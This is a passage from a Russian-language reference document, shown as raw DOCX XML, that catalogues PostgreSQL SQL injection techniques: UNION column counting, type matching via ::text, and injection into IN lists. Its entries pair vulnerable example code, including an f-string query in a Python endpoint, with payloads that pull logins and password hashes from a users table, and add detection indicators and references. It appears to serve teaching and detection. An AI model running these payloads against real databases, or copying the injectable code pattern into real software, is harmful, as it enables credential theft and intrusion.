          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">При третьем варианте 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1 UNION SELECT NULL, NULL, NULL--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">и запрос отрабатывает успешно — арность совпала.</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узнаёт число колонок, не получая данных. Это первый из двух подготовительных шагов — за ним следует определение типов (3.1.2).</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PG-парсер проверяет арность UNION-аргументов на стадии анализа: ошибка приходит из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">transformSetOperationTree()</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src/backend/parser/analyze.c</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по позиции проверяется allowed range — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> валиден, если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">N ∈ [1, число_колонок]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, иначе сообщение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY position N is not in select list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Оба механизма реагируют до выполнения запроса, что делает их быстрыми и надёжными oracle-ами даже для медленных SELECT-ов.</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Никаких специальных привилегий. Достаточно уязвимого кода приложения и канала, по которому различимы успех и ошибка (HTTP-status, отличающийся response body, или видимая ошибка БД).</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N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — нормальная SQL-конструкция, обозначает сортировку по N-й колонке select-list. Часто встречается в отчётах:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT region, SUM(revenue)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM sales</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GROUP BY region</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY 2 DESC;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Само наличие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в логах ≠ инъекция. Признак атаки — последовательный инкремент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в коротком окне времени от одного клиента, плюс ошибки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY position N is not in select list</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или в логе.</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3.1.2 (определение типов), 3.1.4 (извлечение метаданных), 3.2 (error-based — тот же error-канал используется иначе), 3.14.3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по номеру колонки).</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PostgreSQL Documentation: Combining Queries; PortSwigger: SQL injection UNION attacks — determining the number of columns required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.2 Подгонка типов через `::text`</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После того как число колонок известно, нужно подобрать совместимые типы. PG требует, чтобы тип каждой колонки в обеих ветвях UNION приводился к общему типу. Универсальный способ — кастовать всё к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Уязвимый код.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Тот же, что в 3.1.1.</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 Здесь и далее в качестве примера — 3 колонки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 1 — поиск text-совместимой позиции, по очереди подменяя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NULL</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'a'</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">product_id = 1 UNION SELECT 'a', NULL, NULL--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">product_id = 1 UNION SELECT NULL, 'a', NULL--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">product_id = 1 UNION SELECT NULL, NULL, 'a'--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Третий вариант, после подстановки:</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1 UNION SELECT NULL, NULL, 'a'--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Колонка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">price</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет тип </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">numeric</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и каст </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">text → numeric</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не существует. Сервер вернёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION types numeric and text cannot be matched</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Аналогично — для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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integer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). А вторая позиция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тип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varchar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) пройдёт без ошибки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 2 — extraction через text-совместимую колонку:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">product_id = 1 UNION SELECT NULL, current_user::text, NULL--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">product_id = 1 UNION SELECT NULL, version()::text, NULL--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">После подстановки второй вариант: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1 UNION SELECT NULL, version()::text, NULL--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В ответе клиент получает дополнительную строку с версией сервера в позиции колонки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Склейка нескольких значений в одну позицию:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">product_id = 1 UNION SELECT NULL, (login || '|' || password_hash)::text, NULL FROM users--</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1 UNION SELECT NULL, (login || '|' || password_hash)::text, NULL FROM users--</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Эндпоинт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/products</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> начинает возвращать в ответе строки, не имеющие отношения к продуктам — credentials, версии БД, имена ролей. Возвращаются в том же JSON-формате через ту же колонку, что и легитимные данные.</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Для каждой колонки UNION PostgreSQL применяет алгоритм определения общего типа. Если типы совместимы (есть implicit cast в общий тип), результат имеет этот общий тип. Если нет — сервер выдаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION types integer and text cannot be matched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NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-литерал имеет специальный тип </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">unknown</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и совместим с любым типом, поэтому используется как «заполнитель». Каст через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снимает проблему совместимости для любого исходного типа: каждый тип в PG имеет output-функцию, преобразующую значение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Все версии PG. Никаких специальных привилегий.</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каст в SELECT — повседневная конструкция в отчётах, миграциях, debugging:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id, product_name::text || ' (#' || sku::text || ')' AS label</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM products;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сам по себе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не индикатор. Подозрительная комбинация —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внутри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появляющийся от инъекционной точки и не присутствующий в каноническом коде приложения.</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3.1.1, 3.1.4, 3.11.</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PostgreSQL Documentation: Type Conversion — UNION, CASE, and Related Constructs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.3 UNION внутри IN-списка</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Когда инъекция попадает не в скалярное условие, а в IN-список, атакующий закрывает скобку IN, через UNION подсасывает свои данные, а оставшуюся часть исходного запроса (включая закрывающую скобку шаблона) убирает комментарием.</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># api/reports.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from sqlalchemy import text</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@app.post("/orders/by_ids")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def get_orders(ids: str):  # принимает "1,2,3" как строку</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = f"SELECT id, customer_id, total FROM orders WHERE id IN ({ids})"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    async with engine.begin() as conn:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        result = await conn.execute(text(sql))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return [dict(row) for row in result.mappings()]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Базовый вариант:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1, 2, 3) UNION SELECT id, login, password_hash FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">После подстановки сервер видит:</w:t>
      </w:r>
    </w:p>
